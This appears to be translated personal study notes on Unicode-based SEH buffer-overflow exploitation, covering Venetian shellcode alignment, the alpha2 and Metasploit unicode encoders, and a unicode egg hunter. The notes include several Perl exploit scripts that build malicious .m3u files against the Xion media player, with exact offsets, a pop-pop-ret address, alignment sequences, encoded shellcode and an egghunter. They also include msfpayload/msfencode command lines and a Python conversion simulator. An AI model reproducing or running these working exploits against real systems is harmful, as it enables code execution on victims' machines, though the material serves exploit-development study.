UNICODE conversion automatically inserts NULL bytes: a 0x00 is inserted after every ASCII byte of the input.

1) Overwriting ret

Look for a jmp xxx at an address of the form 0x00nn00mm; it can jmp to the shellcode for execution.

2) SEH-based control of EIP + short jmp

Look for a pop pop ret entry address that contains no byte > 0x7f and use it to overwrite the SEH handler.

First set nseh to \xcc\xcc, then look for a two-byte short jmp.

3) SEH-based jmp

Instead of a short jmp, overwrite NSEH with harmless code so that execution runs on past the overwritten SEH structure; the code to execute is then placed right after the overwritten SEH structure, so once nseh + seh have been skipped our code runs.

This requires:

(1) harmless instructions placed in nseh; (2) a "unicode compatible" address to overwrite the SEH handler with, such that executing it does no harm.

When an ASCII byte is > 0x7f, the Unicode conversion turns it into a completely different value, e.g. 0x80 -> 1a20, which can be used to build 0x00nn1a20.

ascii shellcode -> unicode shellcode:

1) Find an equivalent ASCII copy and jump to it:

Once the ASCII input is loaded into memory it has all become Unicode, so look for an ASCII version of the shellcode in memory; if EIP can be controlled and made to jump to that address, the exploit may work. If it cannot be reached, control the contents of some register, jump to that register, and place a few jump instructions there that jump to the ASCII version of the shellcode.

2) Write your own unicode-compatible shellcode

3) Use an encoder

Convert ASCII -> unicode and put a decoder in front of it; after decoding, the original code is produced and executed.

(1) Rebuild the original code at a specific memory address, then jump to that address

One register must point to the entry of decoder+shellcode, and another register must point to a writable memory address (for the shellcode).

(2) Change the execution flow so that it runs into the rebuilt shellcode

A single register pointing to the entry of decoder+shellcode is enough; the original shellcode is rebuilt and stored at that same location.

Tools:

1) makeunicode2.py: didn't figure out how to use it.

2) vense.pl, download: http://www.phenoelit-us.org/win

Generates a byte string containing decoder + original shellcode. To use the decoder, registers must also be set up:

one register pointing directly to the entry of the buffer that holds the shellcode generated by vense.pl, and a second register pointing to a writable and executable memory address that data can be written into.

shellcode entry address = eax,  writable address = edi

Replace $secondstage with a metasploit-generated perl shellcode; after decoding it executes normally.

Running the script prints 1) the original shellcode, 2) the newly generated shellcode, including the decoder.

Put the newly generated shellcode into the exploit, making sure eax -> shellcode entry address. !!! Here the registers must be adjusted again and the jump implemented with unicode-compatible code; the method is linked from the original post.

Once the registers are set, run jmp eax: the decoder extracts the original shellcode and executes it.

Notes:

(1) It cannot be used in an exploit that is not a UNICODE exploit. (2) Although the algorithm used in the script is an improved version of the one in makeunicode2, it still produces very long shellcode, so a large buffer is required.

3) alpha2, download: http://download.csdn.net/detail/hksoobe/4803452

Also included in MSF; it wraps the shellcode inside a decoder.

(1) Only the register pointing to the shellcode entry needs to be specified; no register pointing to a writable/executable address is needed.

(2) The decoder is not contained in the original code; the decoder is self-modifying, and the buffer space required is comparatively small.

The MSF copy was not downloaded and was not used.

root@bt:~/Desktop# ./alpha2 eax --unicode --uppercase < 1.bin

root@bt:~/Desktop# ./alpha2 --help
Usage: ./alpha2 [OPTION] [BASEADDRESS]
ALPHA 2 encodes your IA-32 shellcode to contain only alphanumeric characters.
The result can optionaly be uppercase-only and/or unicode proof. It is a encoded
version of your origional shellcode. It consists of baseaddress-code with some
padding, a decoder routine and the encoded origional shellcode. This will work
for any target OS. The resulting shellcode needs to have RWE-access to modify
it's own code and decode the origional shellcode in memory.

BASEADDRESS
  The decoder routine needs have it's baseaddress in specified register(s). The
  baseaddress-code copies the baseaddress from the given register or stack
  location into the apropriate registers.
  eax, ecx, edx, ecx, esp, ebp, esi, edi
        Take the baseaddress from the given register. (Unicode baseaddress code
        using esp will overwrite the byte of memory pointed to by ebp!)
  [esp], [esp-X], [esp+X]
        Take the baseaddress from the stack.
  seh   The windows "Structured Exception Handler" (seh) can be used to calculate
        the baseaddress automatically on win32 systems. This option is not
        available for unicode-proof shellcodes and the uppercase version isn't
        100% reliable.
  nops  No baseaddress-code, just padding.  If you need to get the baseaddress
        from a source not on the list use this option (combined with --nocompress)
        and replace the nops with your own code. The ascii decoder needs the
        baseaddress in registers ecx and edx, the unicode-proof decoder only in ecx.

  -n            Do not output a trailing newline after the shellcode.
  --nocompress  The baseaddress-code uses "dec"-instructions to lower the required
                padding length. The unicode-proof code will overwrite some bytes
                in front of the shellcode as a result. Use this option if you do
                not want the "dec"-s.
  --unicode     Make shellcode unicode-proof. This means it will only work when it
                gets converted to unicode (inserting a '0' after each byte) before
                it gets executed.
  --uppercase   Make shellcode 100% uppercase characters, uses a few more bytes
                then mixedcase shellcodes.
  --sources     Output a list of BASEADDRESS options for the given combination of
                --uppercase and --unicode.
  --help        Display this help and exit
  --version     Output version information and exit

See the source-files for further details and copying conditions. There is NO
warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.

Acknowledgements:
Thanks to rix for his phrack article on aphanumeric shellcode.
Thanks to obscou for his phrack article on unicode-proof shellcode.
Thanks to Costin Ionescu for the idea behind w32 SEH GetPC code.
Report bugs to <skylined@edup.tudelft.nl>

4) metasploit

root@bt:/opt/framework/msf3# ./msfpayload windows/exec  CMD=calc R |
> ./msfencode -e x86/alpha_mixed -t raw |
> ./msfencode -e x86/unicode_upper BufferRegister=EAX -t perl
[*] x86/alpha_mixed succeeded with size 454 (iteration=1)
[*] x86/unicode_upper succeeded with size 1039 (iteration=1)
my $buf =
"\x50\x50\x59\x41\x49\x41\x49\x41\x49\x41\x49\x41\x51\x41" .
"\x54\x41\x58\x41\x5a\x41\x50\x55\x33\x51\x41\x44\x41\x5a" .
"\x41\x42\x41\x52\x41\x4c\x41\x59\x41\x49\x41\x51\x41\x49" .
"\x41\x51\x41\x50\x41\x35\x41\x41\x41\x50\x41\x5a\x31\x41" . ... (rest omitted)

1) Only a limited instruction set is available.

2) NULL bytes must be avoided, and the shellcode must still run correctly after the NULLs have been inserted.

3) Machine-code alignment problems.

Venetian shellcode technique

Makes sure the NULLs and the instructions end up correctly aligned.

Single-byte instructions that do not clobber registers or break other instructions when converted to UNICODE; if these are not enough, see http://phrack.org/issues/61/11.html#article

00 6e 00: add byte ptr [esi],ch
00 6f 00: add byte ptr [edi],ch
00 70 00: add byte ptr [eax],dh
00 71 00: add byte ptr [ecx],dh
00 72 00: add byte ptr [edx],dh
00 73 00: add byte ptr [ebx],dh
00 62 00: add byte ptr [edx],ah
00 6d 00: add byte ptr [ebp],ch

1) Assume ESI points to a writable address.

Assume the ASCII version of the shellcode is at 0x33445566 and that value is to be written into eax. Perl script:

my $align = "\xb8\x44\xaa";        #mov eax,0xAA004400
$align=$align."\x6e";              #nop/align nullbytes
$align=$align."\x50";              #push eax
$align=$align."\x6e";              #nop/align nullbytes
$align=$align."\x4c";              #dec esp
$align=$align."\x6e";              #nop/align nullbytes
$align=$align."\x58";              #pop eax                     ,eax=0x004400??
$align=$align."\x6e";              #nop/align nullbytes
$align=$align."\x05\x55\x33";      #add eax,33005500h           ,eax=0x334455??
$align=$align."\x6e";              #nop/align nullbytes
$align=$align."\xb0";              #mov al,0  (the inserted null byte serves as the imm8)
#no alignment needed between these 2!
$align=$align."\xb9\x66\xaa";      #mov ecx,AA006600h           ,eax=0x33445500
$align=$align."\xe8";              #add al,ch  (00 e8)          ,eax=0x33445566
$align=$align."\x6e";              #nop/align nullbytes

# Once the ASCII version of the shellcode has been fed into the program that converts it to Unicode and the instructions above have run, EAX has been set to 0x33445566.

# The next step would be jmp eax.

!!! Note: there is a problem here: 0xc3 (ret) does not stay 0xc3 when converted to Unicode, so push eax / ret is not available.

So usually execution just runs straight on into the shellcode.

However, http://bbs.pediy.com/showthread.php?t=126344 says a c3 can possibly be constructed:

'\x72\xcb\x72'  #ret   is converted into '\x72\x00\xc3\x85\x41\x00'

2) Suppose ebp+0x100 is to be put into eax and we then jump to EAX to execute code; first write the assembly:

00401580 >    55            push ebp
00401581      58            pop eax
00401582      05 00140011   add eax,0x11001400
00401587      2D 00130011   sub eax,0x11001300  ; eax = EBP+0x100

Build the code above with the venetian shellcode technique:

\x6e               #nop/align nullbytes
\x55               #push ebp
\x6e               #nop/align nullbytes
\x58               #pop eax
\x6e               #nop/align nullbytes
\x05\x14\x11       #add eax,0x11001400
\x6e               #nop/align nullbytes
\x2d\x13\x11       #sub eax,0x11001300
\x6e               #nop/align nullbytes
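As an added example (not code from the original notes or from any of the tools named here) that covers both the NULL-insertion / > 0x7f behaviour described at the top and the Venetian alignment just shown, the Python script below simulates the ANSI to UTF-16LE conversion and length-decodes the resulting byte stream with only the opcodes that appear in these notes, so the way the inserted 0x00 bytes are absorbed as "add byte ptr [reg],reg8" is visible. It assumes the target process uses the cp1252 ANSI code page (the notes' own machine appears to use GBK, which is tried separately); all function and variable names are the example's own.

```python
# Added example, not from the original notes: simulate the ANSI -> UTF-16LE
# conversion the target performs on an ASCII input and length-decode the result
# with the handful of x86 opcodes used in these notes.  Assumed ANSI code page:
# cp1252; the notes' own machine appears to use GBK (cp936), tried separately.
REG8 = ["al", "cl", "dl", "bl", "ah", "ch", "dh", "bh"]
REG32 = ["eax", "ecx", "edx", "ebx", "esp", "ebp", "esi", "edi"]
# Only opcodes that occur in the notes' listings; anything else raises.
ONE_BYTE = {0x61: "popad", 0x47: "inc edi", 0x55: "push ebp", 0x58: "pop eax",
            0x50: "push eax", 0x40: "inc eax", 0x48: "dec eax", 0x57: "push edi",
            0x4c: "dec esp"}
IMM32 = {0x05: "add eax", 0x2d: "sub eax", 0xb8: "mov eax", 0xb9: "mov ecx"}
IMM8 = {0x34: "xor al", 0xb0: "mov al", 0x70: "jo short"}

def ansi_to_utf16le(buf: bytes, codepage: str = "cp1252") -> bytes:
    """Expand buf like MultiByteToWideChar: a byte the code page maps below
    U+0080 becomes 'xx 00'; anything else becomes a different 16-bit value
    (undefined bytes become U+FFFD here, Windows best-fit maps them)."""
    return buf.decode(codepage, errors="replace").encode("utf-16-le")

def is_unicode_compatible_address(addr: int) -> bool:
    """The 0x00nn00mm shape the notes look for: bytes 1 and 3 zero, the two
    payload bytes <= 0x7f, so the ASCII pair "\\xmm\\xnn" expands to addr."""
    b = addr.to_bytes(4, "little")
    return b[1] == 0 and b[3] == 0 and b[0] <= 0x7f and b[2] <= 0x7f

def address_input_bytes(addr: int) -> bytes:
    """The two ASCII bytes whose expansion equals addr (the notes' $seh)."""
    b = addr.to_bytes(4, "little")
    return bytes([b[0], b[2]])

def disasm(stream: bytes) -> list:
    """Length-decode an expanded stream.  Opcode 0x00 is ADD r/m8,r8; with
    ModRM mod=01 it swallows two more bytes, which is the 'nop/align' trick
    ("\\x6e" in the input -> 00 6e 00 -> add byte ptr [esi],ch)."""
    out, i = [], 0
    while i < len(stream):
        op = stream[i]
        if op == 0x00:
            modrm = stream[i + 1]
            mod, reg, rm = modrm >> 6, (modrm >> 3) & 7, modrm & 7
            if mod == 3:                                 # add reg8,reg8
                out.append(f"add {REG8[rm]},{REG8[reg]}")
                i += 2
            elif mod == 1 and rm != 4:                   # add [reg+disp8],reg8
                out.append(f"add byte ptr [{REG32[rm]}+{stream[i + 2]:#x}],{REG8[reg]}")
                i += 3
            else:
                raise ValueError(f"ModRM {modrm:#04x} at {i}: SIB/disp32 form not handled")
        elif op in ONE_BYTE:
            out.append(ONE_BYTE[op])
            i += 1
        elif op in IMM32:
            out.append(f"{IMM32[op]},{int.from_bytes(stream[i + 1:i + 5], 'little'):#x}")
            i += 5
        elif op in IMM8:
            out.append(f"{IMM8[op]},{stream[i + 1]:#x}")
            i += 2
        else:
            raise ValueError(f"opcode {op:#04x} at offset {i} is not in the table")
    return out

# The notes' nseh (popad + align byte), seh (0x00470034, pop pop ret) and the
# Venetian sequence for eax = ebp + 0x100, as they sit in the input file.
NSEH = b"\x61\x62"
SEH = address_input_bytes(0x00470034)                    # b"\x34\x47"
VENETIAN = b"\x6e\x55\x6e\x58\x6e\x05\x14\x11\x6e\x2d\x13\x11\x6e"

def walk_from_nseh() -> list:
    """What the CPU executes once the pop/pop/ret lands on nseh."""
    return disasm(ansi_to_utf16le(NSEH + SEH + VENETIAN))

if __name__ == "__main__":
    print("\n".join(walk_from_nseh()))
    print("0x80 ->", ansi_to_utf16le(b"\x80").hex())      # ac20: no longer 80 00
    print("c3 85 (gbk) ->", ansi_to_utf16le(b"\xc3\x85", "gbk").hex())
```

The decoded list shows the seh dword itself executing harmlessly (xor al,0 / inc edi) before the Venetian sequence, which is why the notes insist on a "unicode compatible" handler address.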

An example: xion 1.0 build 120.

Debugging with OD gives an offset of 0x235.

Then:

!pvefindaddr p2

#Found pop esi - pop ebx - ret at 0x0043003B [xion.exe] ** Unicode compatible **  ** Null byte ** - [ Ascii printable] {PAGE_EXECUTE_WRITECOPY} [SafeSEH: ** NO ** - ASLR: ** No (Probably not) **] [Fixup: ** NO **]  - C:\Program Files\r2 Studios\Xion\Xion.exe
#Found pop esi - pop ebp - ret at 0x00470034 [xion.exe] ** Unicode compatible **  ** Null byte ** - [ Ascii printable] {PAGE_EXECUTE_WRITECOPY} [SafeSEH: ** NO ** - ASLR: ** No (Probably not) **] [Fixup: ** NO **]  - C:\Program Files\r2 Studios\Xion\Xion.exe
#Found pop edi - pop esi - ret at 0x00480063 [xion.exe] ** Unicode compatible **  ** Null byte ** - [ Ascii printable] {PAGE_EXECUTE_WRITECOPY} [SafeSEH: ** NO ** - ASLR: ** No (Probably not) **] [Fixup: ** NO **]  - C:\Program Files\r2 Studios\Xion\Xion.exe

Bytes > 0x7f cannot be used.

0x00470034 is chosen here.

The following one was worked out with WINDBG and does not count as a success yet; only after further debugging did the shellcode run correctly.

my $file = "test.m3u";
#my $junk = "A"x270;
my $nseh = "\x61\x62";     #61 is popad, 62 is the align byte
my $seh  = "\x34\x47";     #0x00470034: pop pop ret
#Found pop esi - pop ebx - ret at 0x0043003B [xion.exe] ** Unicode compatible **  ** Null byte ** - [ Ascii printable] {PAGE_EXECUTE_WRITECOPY} [SafeSEH: ** NO ** - ASLR: ** No (Probably not) **] [Fixup: ** NO **]  - C:\Program Files\r2 Studios\Xion\Xion.exe
#Found pop esi - pop ebp - ret at 0x00470034 [xion.exe] ** Unicode compatible **  ** Null byte ** - [ Ascii printable] {PAGE_EXECUTE_WRITECOPY} [SafeSEH: ** NO ** - ASLR: ** No (Probably not) **] [Fixup: ** NO **]  - C:\Program Files\r2 Studios\Xion\Xion.exe
#Found pop edi - pop esi - ret at 0x00480063 [xion.exe] ** Unicode compatible **  ** Null byte ** - [ Ascii printable] {PAGE_EXECUTE_WRITECOPY} [SafeSEH: ** NO ** - ASLR: ** No (Probably not) **] [Fixup: ** NO **]  - C:\Program Files\r2 Studios\Xion\Xion.exe
my $VenetianShellcode = "\x6e";
$VenetianShellcode = $VenetianShellcode."\x55";          #55            push ebp
$VenetianShellcode = $VenetianShellcode."\x6e";
$VenetianShellcode = $VenetianShellcode."\x58";          #58            pop eax
$VenetianShellcode = $VenetianShellcode."\x6e";
$VenetianShellcode = $VenetianShellcode."\x05\x14\x11";  #05 00140011   add eax,0x11001400
$VenetianShellcode = $VenetianShellcode."\x6e";
$VenetianShellcode = $VenetianShellcode."\x2d\x13\x11";  #2D 00130011   sub eax,0x11001300  -> EBP+0x100
$VenetianShellcode = $VenetianShellcode."\x6e";
#229fe54 - 229fd76 = DE = 222, so only 111 are needed; push eax / ret cannot be used because c3 is not converted correctly to c3
#1) "\x43\x6e"  inc ebx, add byte ptr [esi],ch
my $junk2 = "\x70"x111;   #2) "\x70"  jo xxx  -- 1) and 2) can both serve as nops to align, so that eax points to the first byte of the shellcode
#The buffer is 1840 bits from here, while the shellcode is 1037 bits *2 = 2074, so the shellcode is split into two parts
my $buf =   # encoded shellcode from the msfencode run above
"\x4f\x52\x4d\x50\x4b\x50";#junk
my $junk =
"\x4f\x50\x4b\x51\x55\x50\x45\x52" .
"\x4c\x51\x33\x50\x36\x50\x51\x52\x4c\x52\x36\x51\x5a\x50" .
"\x4f\x54\x30\x50\x4b\x50\x4b\x50\x4b\x52\x30\x52\x32\x52" .
"\x35\x51\x37\x52\x55\x50\x4f\x50\x4b\x52\x31\x50\x57\x52" .
"\x32\x50\x33\x50\x50\x43\x42\x50\x50\x52\x4f\x51\x42\x50" .
"\x4a\x51\x35\x52\x30\x50\x56\x50\x33\x51\x39\x52\x4f\x51" .
"\x39\x51\x35\x50\x45\x50\x33\x50\x51\x54\x31\x52\x30\x52" .
"\x4c\x50\x43\x50\x53\x51\x35\x52\x30\x51\x31\x51\x31\x41" .
"\x41";
$junk = $junk."A"x(270-length($junk));
my $junk3 = "\x42"x(5000-length($junk.$nseh.$seh.$VenetianShellcode.$junk2.$buf));
my $payload = $junk.$nseh.$seh.$VenetianShellcode.$junk2.$buf.$junk3;
open(my $FILE, ">", $file) or die "cannot open $file: $!";
print $FILE $payload;
close($FILE);

Encoding your own shellcode into shellcode that can be used in a unicode exploit:

root@bt:/opt/framework/msf3# cat exploit.m3u |   ./msfencode -e x86/alpha_mixed -t raw |    ./msfencode -e x86/unicode_upper BufferRegister=EAX -t perl
[*] x86/alpha_mixed succeeded with size 277 (iteration=1)
[*] x86/unicode_upper succeeded with size 685 (iteration=1)
my $buf =
"\x50\x50\x59\x41\x49\x41\x49\x41\x49\x41\x49\x41\x51\x41" . ... (rest omitted)

The one below is the correct POC. The open question: the POCs worked out under windbg and under OD (which behaves normally) differ; why is that?

And the POC worked out with windbg is definitely wrong; the one from OD is the correct one.

1)  Find a pop pop ret in unicode form to overwrite the SEH handler; !pvefindaddr p2 can find it.

2)  Use popad in nseh to obtain register + offset pointing to some position inside our input string.

3)  Build the VenetianShellcode so that eax = some position inside our input string.

4)  Build nop/align padding so that eax = the first byte of the shellcode.

5)  Use the generated unicode shellcode with eax = start of the shellcode and execute it; shellcode = decoder + code.

my $file = "test.m3u";   #perl
#my $junk = "A"x270;
my $nseh = "\x61\x62";     #61 is popad, 62 is the align byte
my $seh  = "\x34\x47";     #0x00470034: pop esi - pop ebp - ret (from the !pvefindaddr p2 output above)
my $VenetianShellcode = "\x6e";
$VenetianShellcode = $VenetianShellcode."\x55";          #55            push ebp
$VenetianShellcode = $VenetianShellcode."\x6e";
$VenetianShellcode = $VenetianShellcode."\x58";          #58            pop eax
$VenetianShellcode = $VenetianShellcode."\x6e";
$VenetianShellcode = $VenetianShellcode."\x05\x14\x11";  #05 00140011   add eax,0x11001400
$VenetianShellcode = $VenetianShellcode."\x6e";
$VenetianShellcode = $VenetianShellcode."\x2d\x13\x11";  #2D 00130011   sub eax,0x11001300  -> EBP+0x100
$VenetianShellcode = $VenetianShellcode."\x6e";
#229fe54 - 229fd76 = DE = 222, so only 111 are needed; push eax / ret cannot be used because c3 is not converted correctly to c3
my $junk2 = "\x48\x6e"x42;   #1) "\x43\x6e"  inc ebx, add byte ptr [esi],ch  (\x48 = dec eax is used here, so eax is also lowered by 42)
$junk2 = $junk2."\x70"x6;    #2) "\x70"  jo xxx  -- 1) and 2) can both serve as nops to align, so that eax points to the first byte of the shellcode
#The buffer is 1840 bits from here, while the shellcode is 1037 bits *2 = 2074, so the shellcode is split into two parts
my $buf =   # encoded shellcode from the msfencode run above
"\x4b\x50\x4f\x50\x5a\x54\x37\x51\x31\x51\x31\x41\x41";#junk
my $junk = "A"x235;
my $junk3 = "\x42"x(5000-length($junk.$nseh.$seh.$VenetianShellcode.$junk2.$buf));
my $payload = $junk.$nseh.$seh.$VenetianShellcode.$junk2.$buf.$junk3;
open(my $FILE, ">", $file) or die "cannot open $file: $!";
print $FILE $payload;
close($FILE);

Next, build a unicode version of egg hunting. Egg hunting solves the case where there are not enough characters available: the shellcode is placed somewhere else in memory and is then searched for and executed.

Build the shellcode:

root@xxx:/opt/framework/msf3# ./msfpayload windows/messagebox TEXT="#pand0#" TITLE="#pand0#" R > /root/Desktop/1.bin

...

root@bt:~/Desktop# ./alpha2 eax --unicode --uppercase < 1.bin
PPYAIAIAIAIAQATAXAZAPA3QADAZABARALAYAIAQAIAQAPA5AAAPAZ1AI1A... (rest omitted)

my $file = "test.m3u";   #perl
#my $junk = "A"x270;
my $nseh = "\x61\x62";     #61 is popad, 62 is the align byte
my $seh  = "\x34\x47";     #0x00470034: pop esi - pop ebp - ret (from the !pvefindaddr p2 output above)
my $VenetianShellcode = "\x6e";
$VenetianShellcode = $VenetianShellcode."\x55";          #55            push ebp
$VenetianShellcode = $VenetianShellcode."\x6e";
$VenetianShellcode = $VenetianShellcode."\x58";          #58            pop eax
$VenetianShellcode = $VenetianShellcode."\x6e";
$VenetianShellcode = $VenetianShellcode."\x05\x14\x11";  #05 00140011   add eax,0x11001400
$VenetianShellcode = $VenetianShellcode."\x6e";
$VenetianShellcode = $VenetianShellcode."\x2d\x13\x11";  #2D 00130011   sub eax,0x11001300  -> EBP+0x100
$VenetianShellcode = $VenetianShellcode."\x6e";
#229fe54 - 229fd76 = DE = 222, so only 111 are needed; push eax / ret cannot be used because c3 is not converted correctly to c3
my $junk2 = "\x48\x6e"x42;   #1) "\x43\x6e"  inc ebx, add byte ptr [esi],ch  (\x48 = dec eax is used here)
$junk2 = $junk2."\x70"x6;    #2) "\x70"  jo xxx  -- 1) and 2) can both serve as nops to align, so that eax points to the first byte of the shellcode
#The buffer is 1840 bits from here, while the shellcode is 1037 bits *2 = 2074, so the shellcode is split into two parts
my $egghunter =
"PPYAIAIAIAIAQATAXAZAPA3QADAZABARALAYAIAQAIAQAPA5AAAPAZ1AI1AIAIAJ11AIAIAXA58AAPAZABABQI1AIQIAIQI1111AIAJQI1AYAZBABABABAB30APB944JBQVU1XJKOLOQ2R2QZLB0X8MNNOLM5QJ44JO6XM0P0KPT44KKJ6O45IZFO3EJGKOIWA";
#the egg is \x00\x30\x00\x74
$junk2 = $junk2.$egghunter;
my $garbage = "X"x100;   ######## garbage ########
my $aligin = "\x6d".
"\x57".          #push edi
"\x6d".
"\x58".          #pop eax
"\x6d".
"\x05\x14\x11".  #05 00140011   add eax,0x11001400
"\x6d".
"\x2d\x13\x11".  #2D 00130011   sub eax,0x11001300  -> eax+0x100
"\x6d".
"\x40".          #inc eax
"\x6d".
"\x70"x113;      #note: the difference produced by the add/sub has to be divided by 2
my $buf = "";    # the alpha2 --unicode --uppercase encoded messagebox shellcode from above goes here (bytes not reproduced on the page)
#panda0#
my $junk = "A"x235;
my $junk3 = "\x42"x(5000-length($junk.$nseh.$seh.$VenetianShellcode.$junk2.$garbage."0t0t".$aligin.$buf));
my $payload = $junk.$nseh.$seh.$VenetianShellcode.$junk2.$garbage."0t0t".$aligin.$buf.$junk3;
open(my $FILE, ">", $file) or die "cannot open $file: $!";
print $FILE $payload;
close($FILE);
